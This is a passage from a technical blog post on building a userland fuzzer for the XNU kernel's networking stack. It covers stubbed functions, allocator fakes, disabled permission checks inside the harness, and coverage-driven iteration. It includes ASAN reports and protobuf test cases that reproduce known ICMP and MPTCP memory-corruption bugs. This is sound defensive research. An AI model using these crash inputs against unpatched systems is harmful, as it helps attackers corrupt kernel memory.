We’ll be implementing our stubbed functions with fake variants that attempt to have the same semantics. For example, when testing code that uses an external database library, you could replace the database with a simple in-memory implementation. If you don’t care about finding database bugs, this often makes fuzzing simpler and more robust. For some kernel subsystems unrelated to networking we can use entirely different or null implementations. This process is reminiscent of high-level emulation, an idea used in game console emulation. Rather than aiming to emulate hardware, you can try to preserve the semantics but use a custom implementation of the API. Because we only care about testing networking, this is how we approach faking subsystems in this project.

I always start by looking at the original function implementation. If it’s possible, I just link in that code as well. But some functionality isn’t compatible with our fuzzer and must be faked. For example, zalloc should call the userland malloc since virtual memory is already managed by our host kernel and we have allocator facilities available. Similarly, copyin and copyout need to be faked as they no longer serve to copy data between user and kernel pages. Sometimes we also just “nop” out functionality that we don’t care about. We’ll cover these decisions in more detail later in the “High-Level Emulation” phase. Note that by implementing these stubs lazily whenever our fuzz target hits them, we immediately reduce the work in handling all the unrelated functions by an order of magnitude. It’s easier to stay motivated when you only implement fakes for functions that are used by the target code. This approach successfully saved me a lot of time and I’ve used it on subsequent projects as well. At the time of writing, I have 398 stubbed functions, about 250 functions that are trivially faked (return 0 or void functions that do nothing), and about 25 functions that I faked myself (almost all related to porting the memory allocation systems to userland).

Booting Up

As soon as we start running the fuzzer, we’ll run into a snag: many resources require a one-time initialization that happens on boot. The BSD half of the kernel is mostly initialized by calling the bsd_init function. That function, in turn, calls several subsystem-specific initialization functions. Keeping with the theme of supporting a minimally necessary subset of the kernel, rather than call bsd_init, we create a new function that only initializes parts of the kernel as needed.

Here’s an example crash that occurs without the one time kernel bootup initialization:

    #7 0x7effbc464ad0 in zalloc /source/build3/../fuzz/zalloc.c:35:3

    #8 0x7effbb62eab4 in pipepair_alloc /source/build3/../bsd/kern/sys_pipe.c:634:24

    #9 0x7effbb62ded5 in pipe /source/build3/../bsd/kern/sys_pipe.c:425:10

    #10 0x7effbc4588ab in pipe_wrapper /source/build3/../fuzz/syscall_wrappers.c:216:10

    #11 0x4ee1a4 in TestOneProtoInput(Session const&) /source/build3/../fuzz/net_fuzzer.cc:979:19

Our zalloc implementation (covered in the next section) failed because the pipe zone wasn’t yet initialized:

static int

pipepair_alloc(struct pipe **rp_out, struct pipe **wp_out)

{

        struct pipepair *pp = zalloc(pipe_zone);

Scrolling up in sys_pipe.c, we see where that zone is initialized:

void

pipeinit(void)

{

        nbigpipe = 0;

        vm_size_t zone_size;

        zone_size = 8192 * sizeof(struct pipepair);

        pipe_zone = zinit(sizeof(struct pipepair), zone_size, 4096, "pipe zone");

Sure enough, this function is called by bsd_init. By adding that to our initial setup function the zone works as expected. After some development cycles spent supporting all the needed bsd_init function calls, we have the following:

__attribute__((visibility("default"))) bool initialize_network() {

  mcache_init();

  mbinit();

  eventhandler_init();

  pipeinit();

  dlil_init();

  socketinit();

  domaininit();

  loopattach();

  ether_family_init();

  tcp_cc_init();

  net_init_run();

  int res = necp_init();

  assert(!res);

  return true;

}


The original
bsd_init is 683 lines long, but our initialize_network clone is the preceding short snippet. I want to remark how cool I found it that you could “boot” a kernel like this and have everything work so long as you implemented all the relevant stubs. It just goes to show a surprising fact: a significant amount of kernel code is portable, and simple steps can be taken to make it testable. These codebases can be modernized without being fully rewritten. As this “boot” relies on dynamic allocation, let’s look at how I implemented that next.

Dynamic Memory Allocation

Providing a virtual memory abstraction is a fundamental goal of most kernels, but the good news is this is out of scope for this project (this is left as an exercise for the reader). Because networking already assumes working virtual memory, the network stack functions almost entirely on top of high-level allocator APIs. This makes the subsystem amenable to “high-level emulation”. We can create a thin shim layer that intercepts XNU specific allocator calls and translates them to the relevant host APIs.

In practice, we have to handle three types of allocations for this project: “classic” allocations (malloc/calloc/free), zone allocations (zalloc), and mbuf (memory buffers). The first two types are more fundamental allocation types used across XNU, while mbufs are a common data structure used in low-level networking code.

The zone allocator is reasonably complicated, but we use a simplified model for our purposes: we just track the size assigned to a zone when it is created and make sure we malloc that size when zalloc is later called using the initialized zone. This could undoubtedly be modeled better, but this initial model worked quite well for the types of bugs I was looking for. In practice, this simplification affects exploitability, but we aren’t worried about that for a fuzzing project as we can assess that manually once we discover an issue. As you can see below, I created a custom zone type that simply stored the configured size, knowing that my zinit would return an opaque pointer that would be passed to my zalloc implementation, which could then use calloc to service the request. zfree simply freed the requested bytes and ignored the zone, as allocation sizes are tracked by the host malloc already.

struct zone {

  uintptr_t size;

};

struct zone* zinit(uintptr_t size, uintptr_t max, uintptr_t alloc,

                   const char* name) {

  struct zone* zone = (struct zone*)calloc(1, sizeof(struct zone));

  zone->size = size;

  return zone;

}

void* zalloc(struct zone* zone) {

  assert(zone != NULL);

  return calloc(1, zone->size);

}

void zfree(void* zone, void* dat) {

  (void)zone;

  free(dat);

}

Kalloc, kfree, and related functions were passed through to malloc and free as well. You can see fuzz/zalloc.c for their implementations. Mbufs (memory buffers) are more work to implement because they contain considerable metadata that is exposed to the “client” networking code.

struct m_hdr {

        struct mbuf     *mh_next;       /* next buffer in chain */

        struct mbuf     *mh_nextpkt;    /* next chain in queue/record */

        caddr_t         mh_data;        /* location of data */

        int32_t         mh_len;         /* amount of data in this mbuf */

        u_int16_t       mh_type;        /* type of data in this mbuf */

        u_int16_t       mh_flags;       /* flags; see below */

};

/*

 * The mbuf object

 */

struct mbuf {

        struct m_hdr m_hdr;

        union {

                struct {

                        struct pkthdr MH_pkthdr;        /* M_PKTHDR set */

                        union {

                                struct m_ext MH_ext;    /* M_EXT set */

                                char    MH_databuf[_MHLEN];

                        } MH_dat;

                } MH;

                char    M_databuf[_MLEN];               /* !M_PKTHDR, !M_EXT */

        } M_dat;

};


I didn’t include the
pkthdr nor m_ext structure definitions, but they are nontrivial (you can see for yourself in bsd/sys/mbuf.h). A lot of trial and error was needed to create a simplified mbuf format that would work. In practice, I use an inline buffer when possible and, when necessary, locate the data in one large external buffer and set the M_EXT flag. As these allocations must be aligned, I use posix_memalign to create them, rather than malloc. Fortunately ASAN can help manage these allocations, so we can detect some bugs with this modification.

Two bugs I reported via the Project Zero tracker highlight the benefit of the heap-based mbuf implementation. In the first report, I detected an mbuf double free using ASAN. While the m_free implementation tries to detect double frees by checking the state of the allocation, ASAN goes even further by quarantining recently freed allocations to detect the bug. In this case, it looks like the fuzzer would have found the bug either way, but it was impressive. The second issue linked is much subtler and requires some instrumentation to detect the bug, as it is a use after free read of an mbuf:

==22568==ERROR: AddressSanitizer: heap-use-after-free on address 0x61500026afe5 at pc 0x7ff60f95cace bp 0x7ffd4d5617b0 sp 0x7ffd4d5617a8

READ of size 1 at 0x61500026afe5 thread T0

    #0 0x7ff60f95cacd in tcp_input bsd/netinet/tcp_input.c:5029:25

    #1 0x7ff60f949321 in tcp6_input bsd/netinet/tcp_input.c:1062:2

    #2 0x7ff60fa9263c in ip6_input bsd/netinet6/ip6_input.c:1277:10

0x61500026afe5 is located 229 bytes inside of 256-byte region [0x61500026af00,0x61500026b000)

freed by thread T0 here:

    #0 0x4a158d in free /b/swarming/w/ir/cache/builder/src/third_party/llvm/compiler-rt/lib/asan/asan_malloc_linux.cpp:123:3

    #1 0x7ff60fb7444d in m_free fuzz/zalloc.c:220:3

    #2 0x7ff60f4e3527 in m_freem bsd/kern/uipc_mbuf.c:4842:7

    #3 0x7ff60f5334c9 in sbappendstream_rcvdemux bsd/kern/uipc_socket2.c:1472:3

    #4 0x7ff60f95821d in tcp_input bsd/netinet/tcp_input.c:5019:8

    #5 0x7ff60f949321 in tcp6_input bsd/netinet/tcp_input.c:1062:2

    #6 0x7ff60fa9263c in ip6_input bsd/netinet6/ip6_input.c:1277:10


Apple managed to catch this issue before I reported it, fixing it in iOS 13. I believe Apple has added some internal hardening or testing for mbufs that caught this bug. It could be anything from a hardened mbuf allocator like
GWP-ASAN, to an internal ARM MTE test, to simple auditing, but it was really cool to see this issue detected in this way, and also that Apple was proactive enough to find this themselves.

Accessing User Memory

When talking about this project with a fellow attendee at a fuzzing conference, their biggest question was how I handled user memory access. Kernels are never supposed to trust pointers provided by user-space, so whenever the kernel wants to access memory-mapped in userspace, it goes through intermediate functions copyin and copyout. By replacing these functions with our fake implementations, we can supply fuzzer-provided input to the tested code. The real kernel would have done the relevant copies from user to kernel pages. Because these copies are driven by the target code and not our testcase, I added a buffer in the protobuf specification to be used to service these requests.

Here’s a backtrace from our stub before we implement `copyin`. As you can see, when calling the `recvfrom` syscall, our fuzzer passed in a pointer as an argument.

    #6 0x7fe1176952f3 in Assert /source/build3/../fuzz/stubs.c:21:3

    #7 0x7fe11769a110 in copyin /source/build3/../fuzz/fake_impls.c:408:3

    #8 0x7fe116951a18 in __copyin_chk /source/build3/../bsd/libkern/copyio.h:47:9

    #9 0x7fe116951a18 in recvfrom_nocancel /source/build3/../bsd/kern/uipc_syscalls.c:2056:11

    #10 0x7fe117691a86 in recvfrom_nocancel_wrapper /source/build3/../fuzz/syscall_wrappers.c:244:10

    #11 0x4e933a in TestOneProtoInput(Session const&) /source/build3/../fuzz/net_fuzzer.cc:936:9

    #12 0x4e43b8 in LLVMFuzzerTestOneInput /source/build3/../fuzz/net_fuzzer.cc:631:1

I’ve extended the copyin specification with my fuzzer-specific semantics: when the pointer (void*)1 is passed as an address, we interpret this as a request to fetch arbitrary bytes. Otherwise, we copy directly from that virtual memory address. This way, we can begin by passing (void*)1 everywhere in the fuzz target to get as much cheap coverage as possible. Later, as we want to construct well-formed data to pass into syscalls, we build the data in the protobuf test case handler and pass a real pointer to it, allowing it to be copied. This flexibility saves us time while permitting the construction of highly-structured data inputs as we see fit.

int __attribute__((warn_unused_result))

copyin(void* user_addr, void* kernel_addr, size_t nbytes) {

  // Address 1 means use fuzzed bytes, otherwise use real bytes.

  // NOTE: this does not support nested useraddr.

  if (user_addr != (void*)1) {

    memcpy(kernel_addr, user_addr, nbytes);

    return 0;

  }

  if (get_fuzzed_bool()) {

    return -1;

  }

  get_fuzzed_bytes(kernel_addr, nbytes);

  return 0;

}

Copyout is designed similarly. We often don’t care about the data copied out; we just care about the safety of the accesses. For that reason, we make sure to memcpy from the source buffer in all cases, using a temporary buffer when a copy to (void*)1 occurs. If the kernel copies out of bounds or from freed memory, for example, ASAN will catch it and inform us about a memory disclosure vulnerability.

Synchronization and Threads

Among the many changes made to XNU’s behavior to support this project, perhaps the most extensive and invasive are the changes I made to the synchronization and threading model. Before beginning this project, I had spent over a year working on Chrome browser process research, where high level “sequences” are preferred to using physical threads. Despite a paucity of data races, Chrome still had sequence-related bugs that were triggered by randomly servicing some of the pending work in between performing synchronous IPC calls. In an exploit for a bug found by the AppCache fuzzer, sleep calls were needed to get the asynchronous work to be completed before queueing up some more work synchronously. So I already knew that asynchronous continuation-passing style concurrency could have exploitable bugs that are easy to discover with this fuzzing approach.

I suspected I could find similar bugs if I used a similar model for sockfuzzer. Because XNU uses multiple kernel threads in its networking stack, I would have to port it to a cooperative style. To do this, I provided no-op implementations for all of the thread management functions and sync primitives, and instead randomly called the work functions that would have been called by the real threads. This involved modifying code: most worker threads run in a loop, processing new work as it comes in. I modified these infinitely looping helper functions to do one iteration of work and exposed them to the fuzzer frontend. Then I called them randomly as part of the protobuf message. The main benefit of doing the project this way was improved performance and determinism. Places where the kernel could block the fuzzer were modified to return early. Overall, it was a lot simpler and easier to manage a single-threaded process. But this decision did not end up yielding as many bugs as I had hoped. For example, I suspected that interleaving garbage collection of various network-related structures with syscalls would be more effective. It did achieve the goal of removing threading-related headaches from deploying the fuzzer, but this is a serious weakness that I would like to address in future fuzzer revisions.

Randomness

Randomness is another service provided by kernels to userland (e.g. /dev/random) and in-kernel services requiring it. This is easy to emulate: we can just return as many bytes as were requested from the current test case’s data_provider field.

Authentication

XNU features some mechanisms (KAuth, mac checks, user checks) to determine whether a given syscall is permissible. Because of the importance and relative rarity of bugs in XNU, and my willingness to triage false positives, I decided to allow all actions by default. For example, the TCP multipath code requires a special entitlement, but disabling this functionality precludes us from finding Ian’s multipath vulnerability. Rather than fuzz only code accessible inside the app sandbox, I figured I would just triage whatever comes up and report it with the appropriate severity in mind.

For example, when we create a socket, the kernel checks whether the running process is allowed to make a socket of the given domain, type, and protocol provided their KAuth credentials:

static int

socket_common(struct proc *p,

    int domain,

    int type,

    int protocol,

    pid_t epid,

    int32_t *retval,

    int delegate)

{

        struct socket *so;

        struct fileproc *fp;

        int fd, error;

        AUDIT_ARG(socket, domain, type, protocol);

#if CONFIG_MACF_SOCKET_SUBSET

        if ((error = mac_socket_check_create(kauth_cred_get(), domain,

            type, protocol)) != 0) {

                return error;

        }

#endif /* MAC_SOCKET_SUBSET */

When we reach this function in our fuzzer, we trigger an assert crash as this functionality was  stubbed.

    #6 0x7f58f49b53f3 in Assert /source/build3/../fuzz/stubs.c:21:3

    #7 0x7f58f49ba070 in kauth_cred_get /source/build3/../fuzz/fake_impls.c:272:3

    #8 0x7f58f3c70889 in socket_common /source/build3/../bsd/kern/uipc_syscalls.c:242:39

    #9 0x7f58f3c7043a in socket /source/build3/../bsd/kern/uipc_syscalls.c:214:9

    #10 0x7f58f49b45e3 in socket_wrapper /source/build3/../fuzz/syscall_wrappers.c:371:10

    #11 0x4e8598 in TestOneProtoInput(Session const&) /source/build3/../fuzz/net_fuzzer.cc:655:19

Now, we need to implement kauth_cred_get. In this case, we return a (void*)1 pointer so that NULL checks on the value will pass (and if it turns out we need to model this correctly, we’ll crash again when the pointer is used).

void* kauth_cred_get() {

  return (void*)1;

}

Now we crash actually checking the KAuth permissions.

    #6 0x7fbe9219a3f3 in Assert /source/build3/../fuzz/stubs.c:21:3

    #7 0x7fbe9219f100 in mac_socket_check_create /source/build3/../fuzz/fake_impls.c:312:33

    #8 0x7fbe914558a3 in socket_common /source/build3/../bsd/kern/uipc_syscalls.c:242:15

    #9 0x7fbe9145543a in socket /source/build3/../bsd/kern/uipc_syscalls.c:214:9

    #10 0x7fbe921995e3 in socket_wrapper /source/build3/../fuzz/syscall_wrappers.c:371:10

    #11 0x4e8598 in TestOneProtoInput(Session const&) /source/build3/../fuzz/net_fuzzer.cc:655:19

    #12 0x4e76c2 in LLVMFuzzerTestOneInput /source/build3/../fuzz/net_fuzzer.cc:631:1

Now we simply return 0 and move on.

int mac_socket_check_create() { return 0; }

As you can see, we don’t always need to do a lot of work to fake functionality. We can opt for a much simpler model that still gets us the results we want.

Coverage Guided Development

We’ve paid a sizable initial cost to implement this fuzz target, but we’re now entering the longest and most fun stage of the project: iterating and maintaining the fuzzer. We begin by running the fuzzer continuously (in my case, I ensured it could run on ClusterFuzz). A day of work then consists of fetching the latest corpus, running a clang-coverage visualization pass over it, and viewing the report. While initially most of the work involved fixing assertion failures to get the fuzzer working, we now look for silent implementation deficiencies only visible in the coverage reports. A snippet from the report looks like the following:

Several lines of code have a column indicating that they have been covered tens of thousands of times. Below them, you can see a switch statement for handling the parsing of IP options. Only the default case is covered approximately fifty thousand times, while the routing record options are covered 0 times.

This excerpt from IP option handling shows that we don’t support the various packets well with the current version of the fuzzer and grammar. Having this visualization is enormously helpful and necessary to succeed, as it is a source of truth about your fuzz target. By directing development work around these reports, it’s relatively easy to plan actionable and high-value tasks around the fuzzer.

I like to think about improving a fuzz target by either improving “soundness” or “completeness.” Logicians probably wouldn’t be happy with how I’m loosely using these terms, but they are a good metaphor for the task. To start with, we can improve the completeness of a given fuzz target by helping it reach code that we know to be reachable based on manual review. In the above example, I would suspect very strongly that the uncovered option handling code is reachable. But despite a long fuzzing campaign, these lines are uncovered, and therefore our fuzz target is incomplete, somehow unable to generate inputs reaching these lines. There are two ways to get this needed coverage: in a top-down or bottom-up fashion. Each has its tradeoffs. The top-down way to cover this code is to improve the existing grammar or C++ code to make it possible or more likely. The bottom-up way is to modify the code in question. For example, we could replace switch (opt) with something like switch (global_fuzzed_data->ConsumeRandomEnum(valid_enums). This bottom-up approach introduces unsoundness, as maybe these enums could never have been selected at this point. But this approach has often led to interesting-looking crashes that encouraged me to revert the change and proceed with the more expensive top-down implementation. When it’s one researcher working against potentially hundreds of thousands of lines, you need tricks to prioritize your work. By placing many cheap bets, you can revert later for free and focus on the most fruitful areas.

Improving soundness is the other side of the coin here. I’ve just mentioned reverting unsound changes and moving those changes out of the target code and into the grammar. But our fake objects are also simple models for how their real implementations behave. If those models are too simple or directly inaccurate, we may either miss bugs or introduce them. I’m comfortable missing some bugs as I think these simple fakes enable better coverage, and it’s a net win. But sometimes, I’ll observe a crash or failure to cover some code because of a faulty model. So improvements can often come in the form of making these fakes better.

All in all, there is plenty of work that can be done at any given point. Fuzzing isn’t an all or nothing one-shot endeavor for large targets like this. This is a continuous process, and as time goes on, easy gains become harder to achieve as most bugs detectable with this approach are found, and eventually, there comes a natural stopping point. But despite working on this project for several months, it’s remarkably far from the finish line despite producing several useful bug reports. The cool thing about fuzzing in this way is that it is a bit like excavating a fossil. Each target is different; we make small changes to the fuzzer, tapping away at the target with a chisel each day and letting our coverage metrics, not our biases, reveal the path forward.

Packet Delivery

I’d like to cover one example to demonstrate the value of the “bottom-up” unsound modification, as in some cases, the unsound modification is dramatically cheaper than the grammar-based one. Disabling hash checks is a well-known fuzzer-only modification when fuzzer-authors know that checksums could be trivially generated by hand. But it can also be applied in other places, such as packet delivery.

When an mbuf containing a TCP packet arrives, it is handled by tcp_input. In order for almost anything meaningful to occur with this packet, it must be matched by IP address and port to an existing process control block (PCB) for that connection, as seen below.

void

tcp_input(struct mbuf *m, int off0)

{

// ...

        if (isipv6) {

            inp = in6_pcblookup_hash(&tcbinfo, &ip6->ip6_src, th->th_sport,

                &ip6->ip6_dst, th->th_dport, 1,

                m->m_pkthdr.rcvif);

        } else

#endif /* INET6 */

        inp = in_pcblookup_hash(&tcbinfo, ip->ip_src, th->th_sport,

            ip->ip_dst, th->th_dport, 1, m->m_pkthdr.rcvif);

Here’s the IPv4 lookup code. Note that faddr, fport_arg, laddr, and lport_arg are all taken directly from the packet and are checked against the list of PCBs, one at a time. This means that we must guess two 4-byte integers and two 2-byte shorts to match the packet to the relevant PCB. Even coverage-guided fuzzing is going to have a hard time guessing its way through these comparisons. While eventually a match will be found, we can radically improve the odds of covering meaningful code by just flipping a coin instead of doing the comparisons. This change is extremely easy to make, as we can fetch a random boolean from the fuzzer at runtime. Looking up existing PCBs and fixing up the IP/TCP headers before sending the packets is a sounder solution, but in my testing this change didn’t introduce any regressions. Now when a vulnerability is discovered, it’s just a matter of fixing up headers to match packets to the appropriate PCB. That’s light work for a vulnerability researcher looking for a remote memory corruption bug.

/*

 * Lookup PCB in hash list.

 */

struct inpcb *

in_pcblookup_hash(struct inpcbinfo *pcbinfo, struct in_addr faddr,

    u_int fport_arg, struct in_addr laddr, u_int lport_arg, int wildcard,

    struct ifnet *ifp)

{

// ...

    head = &pcbinfo->ipi_hashbase[INP_PCBHASH(faddr.s_addr, lport, fport,

        pcbinfo->ipi_hashmask)];

    LIST_FOREACH(inp, head, inp_hash) {

-               if (inp->inp_faddr.s_addr == faddr.s_addr &&

-                   inp->inp_laddr.s_addr == laddr.s_addr &&

-                   inp->inp_fport == fport &&

-                   inp->inp_lport == lport) {

+               if (!get_fuzzed_bool()) {

                        if (in_pcb_checkstate(inp, WNT_ACQUIRE, 0) !=

                            WNT_STOPUSING) {

                                lck_rw_done(pcbinfo->ipi_lock);

                                return inp;


Astute readers may have noticed that the PCBs are fetched from a hash table, so it’s not enough just to replace the check. The 4 values used in the linear search are used to calculate a PCB hash, so we have to make sure all PCBs share a single bucket, as seen in the diff below. The real kernel shouldn’t do this as lookups become O(n), but we only create a few sockets, so it’s acceptable.

diff --git a/bsd/netinet/in_pcb.h b/bsd/netinet/in_pcb.h

index a5ec42ab..37f6ee50 100644

--- a/bsd/netinet/in_pcb.h

+++ b/bsd/netinet/in_pcb.h

@@ -611,10 +611,9 @@ struct inpcbinfo {

        u_int32_t               ipi_flags;

 };

-#define INP_PCBHASH(faddr, lport, fport, mask) \

-       (((faddr) ^ ((faddr) >> 16) ^ ntohs((lport) ^ (fport))) & (mask))

-#define INP_PCBPORTHASH(lport, mask) \

-       (ntohs((lport)) & (mask))

+// nedwill: let all pcbs share the same hash

+#define        INP_PCBHASH(faddr, lport, fport, mask) (0)

+#define        INP_PCBPORTHASH(lport, mask) (0)

 #define INP_IS_FLOW_CONTROLLED(_inp_) \

        ((_inp_)->inp_flags & INP_FLOW_CONTROLLED)

Checking Our Work: Reproducing the Sample Bugs

With most of the necessary supporting code implemented, we can fuzz for a while without hitting any assertions due to unimplemented stubbed functions. At this stage, I reverted the fixes for the two inspiration bugs I mentioned at the beginning of this article. Here’s what we see shortly after we run the fuzzer with those fixes reverted:

==1633983==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61d00029f474 at pc 0x00000049fcb7 bp 0x7ffcddc88590 sp 0x7ffcddc87d58

WRITE of size 20 at 0x61d00029f474 thread T0

    #0 0x49fcb6 in __asan_memmove /b/s/w/ir/cache/builder/src/third_party/llvm/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cpp:30:3

    #1 0x7ff64bd83bd9 in __asan_bcopy fuzz/san.c:37:3

    #2 0x7ff64ba9e62f in icmp_error bsd/netinet/ip_icmp.c:362:2

    #3 0x7ff64baaff9b in ip_dooptions bsd/netinet/ip_input.c:3577:2

    #4 0x7ff64baa921b in ip_input bsd/netinet/ip_input.c:2230:34

    #5 0x7ff64bd7d440 in ip_input_wrapper fuzz/backend.c:132:3

    #6 0x4dbe29 in DoIpInput fuzz/net_fuzzer.cc:610:7

    #7 0x4de0ef in TestOneProtoInput(Session const&) fuzz/net_fuzzer.cc:720:9

0x61d00029f474 is located 12 bytes to the left of 2048-byte region [0x61d00029f480,0x61d00029fc80)

allocated by thread T0 here:

    #0 0x4a0479 in calloc /b/s/w/ir/cache/builder/src/third_party/llvm/compiler-rt/lib/asan/asan_malloc_linux.cpp:154:3

    #1 0x7ff64bd82b20 in mbuf_create fuzz/zalloc.c:157:45

    #2 0x7ff64bd8319e in mcache_alloc fuzz/zalloc.c:187:12

    #3 0x7ff64b69ae84 in m_getcl bsd/kern/uipc_mbuf.c:3962:6

    #4 0x7ff64ba9e15c in icmp_error bsd/netinet/ip_icmp.c:296:7

    #5 0x7ff64baaff9b in ip_dooptions bsd/netinet/ip_input.c:3577:2

    #6 0x7ff64baa921b in ip_input bsd/netinet/ip_input.c:2230:34

    #7 0x7ff64bd7d440 in ip_input_wrapper fuzz/backend.c:132:3

    #8 0x4dbe29 in DoIpInput fuzz/net_fuzzer.cc:610:7

    #9 0x4de0ef in TestOneProtoInput(Session const&) fuzz/net_fuzzer.cc:720:9

When we inspect the test case, we see that a single raw IPv4 packet was generated to trigger this bug. This is to be expected, as the bug doesn’t require an existing connection, and looking at the stack, we can see that the test case triggered the bug in the IPv4-specific ip_input path.

commands {

  ip_input {

    raw_ip4: "M\001\000I\001\000\000\000\000\000\000\000III\333\333\333\333\333\333\333\333\333\333IIIIIIIIIIIIII\000\000\000\000\000III\333\333\333\333\333\333\333\333\333\333\333\333IIIIIIIIIIIIII"

  }

}

data_provider: ""


If we fix that issue and fuzz a bit longer, we soon see another crash, this time in the MPTCP stack. This is Ian’s MPTCP vulnerability. The ASAN report looks strange though. Why is it crashing during garbage collection in
mptcp_session_destroy? The original vulnerability was an OOB write, but ASAN couldn’t catch it because it corrupted memory within a struct. This is a well-known shortcoming of ASAN and similar mitigations, importantly the upcoming MTE. This means we don’t catch the bug until later, when a randomly corrupted pointer is accessed.

==1640571==ERROR: AddressSanitizer: attempting free on address which was not malloc()-ed: 0x6190000079dc in thread T0

    #0 0x4a0094 in free /b/s/w/ir/cache/builder/src/third_party/llvm/compiler-rt/lib/asan/asan_malloc_linux.cpp:123:3

    #1 0x7fbdfc7a16b0 in _FREE fuzz/zalloc.c:293:36

    #2 0x7fbdfc52b624 in mptcp_session_destroy bsd/netinet/mptcp_subr.c:742:3

    #3 0x7fbdfc50c419 in mptcp_gc bsd/netinet/mptcp_subr.c:4615:3

    #4 0x7fbdfc4ee052 in mp_timeout bsd/netinet/mp_pcb.c:118:16

    #5 0x7fbdfc79b232 in clear_all fuzz/backend.c:83:3

    #6 0x4dfd5c in TestOneProtoInput(Session const&) fuzz/net_fuzzer.cc:1010:3

0x6190000079dc is located 348 bytes inside of 920-byte region [0x619000007880,0x619000007c18)

allocated by thread T0 here:

    #0 0x4a0479 in calloc /b/s/w/ir/cache/builder/src/third_party/llvm/compiler-rt/lib/asan/asan_malloc_linux.cpp:154:3

    #1 0x7fbdfc7a03d4 in zalloc fuzz/zalloc.c:37:10

    #2 0x7fbdfc4ee710 in mp_pcballoc bsd/netinet/mp_pcb.c:222:8

    #3 0x7fbdfc53cf8a in mptcp_attach bsd/netinet/mptcp_usrreq.c:211:15

    #4 0x7fbdfc53699e in mptcp_usr_attach bsd/netinet/mptcp_usrreq.c:128:10

    #5 0x7fbdfc0e1647 in socreate_internal bsd/kern/uipc_socket.c:784:10

    #6 0x7fbdfc0e23a4 in socreate bsd/kern/uipc_socket.c:871:9

    #7 0x7fbdfc118695 in socket_common bsd/kern/uipc_syscalls.c:266:11

    #8 0x7fbdfc1182d1 in socket bsd/kern/uipc_syscalls.c:214:9

    #9 0x7fbdfc79a26e in socket_wrapper fuzz/syscall_wrappers.c:371:10

    #10 0x4dd275 in TestOneProtoInput(Session const&) fuzz/net_fuzzer.cc:655:19

Here’s the protobuf input for the crashing testcase:

commands {

  socket {

    domain: AF_MULTIPATH

    so_type: SOCK_STREAM

    protocol: IPPROTO_IP

  }

}

commands {

  connectx {

    socket: FD_0

    endpoints {

      sae_srcif: IFIDX_CASE_0

      sae_srcaddr {

        sockaddr_generic {

          sa_family: AF_MULTIPATH

          sa_data: "\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\304"

        }

      }

      sae_dstaddr {

        sockaddr_generic {

          sa_family: AF_MULTIPATH

          sa_data: ""

        }

      }

    }

    associd: ASSOCID_CASE_0

    flags: CONNECT_DATA_IDEMPOTENT

    flags: CONNECT_DATA_IDEMPOTENT

    flags: CONNECT_DATA_IDEMPOTENT

  }

}

commands {

  connectx {

    socket: FD_0

    endpoints {

      sae_srcif: IFIDX_CASE_0

      sae_dstaddr {

        sockaddr_generic {

          sa_family: AF_MULTIPATH

          sa_data: ""

        }

      }

    }

    associd: ASSOCID_CASE_0

    flags: CONNECT_DATA_IDEMPOTENT

  }

}

commands {

  connectx {

    socket: FD_0

    endpoints {

      sae_srcif: IFIDX_CASE_0

      sae_srcaddr {

        sockaddr_generic {

          sa_family: AF_MULTIPATH

          sa_data: ""

        }

      }

      sae_dstaddr {

        sockaddr_generic {

          sa_family: AF_MULTIPATH

          sa_data: "\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\304"

        }

      }

    }

    associd: ASSOCID_CASE_0

    flags: CONNECT_DATA_IDEMPOTENT

    flags: CONNECT_DATA_IDEMPOTENT

    flags: CONNECT_DATA_AUTHENTICATED

  }

}

commands {

  connectx {

    socket: FD_0

    endpoints {

      sae_srcif: IFIDX_CASE_0

      sae_dstaddr {

        sockaddr_generic {

          sa_family: AF_MULTIPATH

          sa_data: ""

        }

      }

    }

    associd: ASSOCID_CASE_0

    flags: CONNECT_DATA_IDEMPOTENT

  }

}

commands {

  close {

    fd: FD_8

  }

}

commands {

  ioctl_real {

    siocsifflags {

      ifr_name: LO0

      flags: IFF_LINK1

    }

  }

}

commands {

  close {

    fd: FD_8

  }

}

data_provider: "\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025"

Hmm, that’s quite large and hard to follow. Is the bug really that complicated? We can use libFuzzer’s crash minimization feature to find out. Protobuf-based test cases simplify nicely because even large test cases are already structured, so we can randomly edit and remove nodes from the message. After about a minute of automated minimization, we end up with the test shown below.

commands {

  socket {

    domain: AF_MULTIPATH

    so_type: SOCK_STREAM

    protocol: IPPROTO_IP

  }

}

commands {

  connectx {

    socket: FD_0

    endpoints {

      sae_srcif: IFIDX_CASE_1

      sae_dstaddr {

        sockaddr_generic {

          sa_family: AF_MULTIPATH

          sa_data: "bugmbuf_debutoeloListen_dedeloListen_dedebuloListete_debugmbuf_debutoeloListen_dedeloListen_dedebuloListeListen_dedebuloListe_dtrte" # string length 131

        }

      }

    }

    associd: ASSOCID_CASE_0

  }

}

data_provider: ""


This is a lot easier to read! It appears that SockFuzzer managed to open a socket from the
AF_MULTIPATH domain and called connectx on it with a sockaddr using an unexpected sa_family, in this case AF_MULTIPATH. Then the large sa_data field was used to overwrite memory. You can see some artifacts of heuristics used by the fuzzer to guess strings as “listen” and “mbuf” appear in the input. This testcase could be further simplified by modifying the sa_data to a repeated character, but I left it as is so you can see exactly what it’s like to work with the output of this fuzzer.

